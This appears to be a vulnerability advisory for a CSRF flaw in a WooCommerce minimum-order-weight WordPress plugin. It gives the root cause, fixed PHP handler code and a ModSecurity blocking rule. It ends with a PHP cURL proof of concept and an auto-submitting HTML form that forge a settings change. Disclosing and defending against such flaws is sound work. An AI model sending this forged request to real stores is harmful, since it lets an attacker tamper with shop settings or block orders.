Atomic Edge analysis of CVE-2026-6932 (metadata-based): This is a Cross-Site Request Forgery (CSRF) vulnerability in the Woo Commerce Minimum Weight plugin versions up to and including 3.0.1. The plugin fails to validate a nonce on the settings update handler in edit-weight.php, allowing an unauthenticated attacker to trick a site administrator into modifying the minimum order weight setting via a crafted request.
Root Cause: The vulnerability stems from missing nonce verification on the settings update handler. Based on the CWE-352 classification and description, the handler in edit-weight.php likely processes POST requests to update plugin settings (minimum weight threshold) without checking a WordPress nonce. This is a common omission in custom admin pages where developers forget to include wp_nonce_field() in the form and check the nonce with wp_verify_nonce() on submission. Atomic Edge analysis infers this from the CWE and description; no source code was available to confirm.
Exploitation: An attacker creates a malicious HTML page or link that, when visited by an authenticated administrator, sends a forged POST request to the vulnerable endpoint. The likely target URL is /wp-admin/admin-post.php?action=wc_min_weight_update or /wp-content/plugins/woo-commerce-min-weight/edit-weight.php. The forged request would include parameters such as 'min_weight' set to an attacker-chosen value (e.g., 0 or a very high number). Since there is no nonce check, WordPress processes the request, changing the minimum order weight setting to disrupt store operations or bypass weight-based restrictions.
Remediation: The plugin should implement a nonce check on the settings handler. Developers must add wp_nonce_field('wc_min_weight_settings', '_wpnonce') to the settings form and verify it with if (!isset($_POST['_wpnonce']) || !wp_verify_nonce($_POST['_wpnonce'], 'wc_min_weight_settings')) { wp_die('Security check failed.'); } in the handler. This aligns with WordPress security best practices and the CSRF vulnerability pattern.
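The following is an added example of what the remediated form and handler look like; it is not the plugin's own code, and Atomic Edge had no source to confirm the plugin's actual structure. The action name wc_min_weight_update and the nonce action wc_min_weight_settings are the values inferred above; the option name wc_min_weight_value, the manage_woocommerce capability and the form rendering function are assumptions. The handler adds the capability check and the input validation that a settings update should carry alongside the nonce check.

```php
<?php
// Added example, not the plugin's code: a nonce- and capability-checked
// settings handler for the admin-post.php update path described above.
// Assumed names: option 'wc_min_weight_value', capability 'manage_woocommerce'.

// Settings form. wp_nonce_field() emits the hidden _wpnonce input (plus
// _wp_http_referer) that the handler below verifies.
function wc_min_weight_render_form() {
    $current = get_option( 'wc_min_weight_value', '0' ); // option name assumed
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="wc_min_weight_update">
        <?php wp_nonce_field( 'wc_min_weight_settings', '_wpnonce' ); ?>
        <label>Minimum order weight
            <input type="number" step="0.01" min="0" name="min_weight"
                   value="<?php echo esc_attr( $current ); ?>">
        </label>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

// Handler. admin_post_{action} only fires for logged-in users; the two
// checks at the top are the ones the analysis says the vulnerable version omits.
function wc_min_weight_handle_update() {
    // 1. Authorization: only users allowed to manage the shop may change this.
    if ( ! current_user_can( 'manage_woocommerce' ) ) { // capability assumed
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF: check_admin_referer() wraps wp_verify_nonce() and dies with a
    //    403 "link has expired" page when the nonce is missing or invalid.
    check_admin_referer( 'wc_min_weight_settings', '_wpnonce' );

    // 3. Input validation: accept only a non-negative number, never raw POST data.
    $raw = isset( $_POST['min_weight'] ) ? wp_unslash( $_POST['min_weight'] ) : '';
    if ( ! is_numeric( $raw ) || (float) $raw < 0 ) {
        wp_die( 'Invalid minimum weight.', '', array( 'response' => 400 ) );
    }
    update_option( 'wc_min_weight_value', (string) (float) $raw );

    // Redirect back to the settings page (PRG pattern) so a reload cannot resubmit.
    $back = wp_get_referer() ? wp_get_referer() : admin_url();
    wp_safe_redirect( add_query_arg( 'updated', '1', $back ) );
    exit;
}
add_action( 'admin_post_wc_min_weight_update', 'wc_min_weight_handle_update' );
```

Two design points worth noting: the handler is registered only on admin_post_wc_min_weight_update, not on admin_post_nopriv_wc_min_weight_update, so unauthenticated requests for this action are ignored by WordPress; and the capability check comes before the nonce check because a valid nonce proves intent, not permission. A WAF rule such as the one below can reduce exposure but does not replace this fix.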
Impact: Successful exploitation allows an attacker to modify the minimum order weight setting without authorization. This can lead to business logic abuse: setting the minimum weight to zero bypasses weight-based restrictions, or setting it to an extremely high value prevents any orders from being placed, causing denial of service for the e-commerce store. The CVSS v3.1 score is 4.3 (Medium) because user interaction is required and the impact is limited to integrity only, with no confidentiality or availability impact.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-6932 (metadata-based)
# Block CSRF attack against Woo Commerce Minimum Weight settings update
# This rule blocks POST requests to admin-post.php with action wc_min_weight_update
# and a numeric min_weight parameter (the attacker's signature). A nonce cannot be
# verified at the WAF layer, so the rule matches whether or not a nonce is present.
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" \
    "id:20261932,phase:2,deny,status:403,chain,t:none,msg:'CVE-2026-6932 CSRF attempt via WooCommerce Min Weight settings',severity:'CRITICAL',tag:'CVE-2026-6932',tag:'wordpress',tag:'csrf'"
    SecRule ARGS_POST:action "@streq wc_min_weight_update" \
        "chain,t:none"
        SecRule ARGS_POST:min_weight "@rx ^\d+$" \
            "t:none"
# Note: This rule will block legitimate admin requests too, because at WAF level we
# cannot verify nonces. The absence of a nonce check IS the vulnerability; this rule
# provides a surgical block on the specific action and parameter instead.
# Consider disabling it if legitimate admin requests use this same route, or apply it
# only until the plugin is patched. Also note that @streq on REQUEST_URI is an exact
# match, so adjust the path if WordPress is installed in a subdirectory.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6932 - Woo Commerce Minimum Weight <= 3.0.1 - Cross-Site Request Forgery via Settings Update Form
// Configuration
$target_url = 'http://example.com/wp-admin/admin-post.php'; // Change to target WordPress site
$action_hook = 'wc_min_weight_update'; // Inferred action hook based on plugin slug
$nonce_field = '_wpnonce'; // Will be absent in vulnerable version
// Prepare POST data (the min_weight parameter name is inferred from the plugin's purpose)
$post_data = array(
'action' => $action_hook,
'min_weight' => '0', // Attacker sets minimum weight to 0 to bypass restrictions
'min_weight_note' => 'Updated via CSRF'
);
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only; use true in production
curl_setopt($ch, CURLOPT_COOKIE, 'admin_cookie_here'); // Placeholder only: in a real CSRF the victim admin's browser supplies the session cookie automatically, so the attacker never needs it.
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Output result
echo "HTTP Response Code: " . $http_code . "\n";
echo "Response Body: " . substr($response, 0, 500) . "\n";
echo "[+] If the request succeeded, the minimum weight setting has been changed to 0.\n";
echo "[+] Note: This PoC assumes the admin is already authenticated via session cookies. In a real CSRF attack, the crafted form would be served from an attacker-controlled page and submitted via an admin's browser automatically.\n";
// Alternative: For direct form submission (more realistic CSRF), use the following HTML payload:
// <form action='http://example.com/wp-admin/admin-post.php' method='POST'>
// <input type='hidden' name='action' value='wc_min_weight_update'>
// <input type='hidden' name='min_weight' value='0'>
// <input type='submit' value='Submit'>
// </form>
// <script>document.forms[0].submit();</script>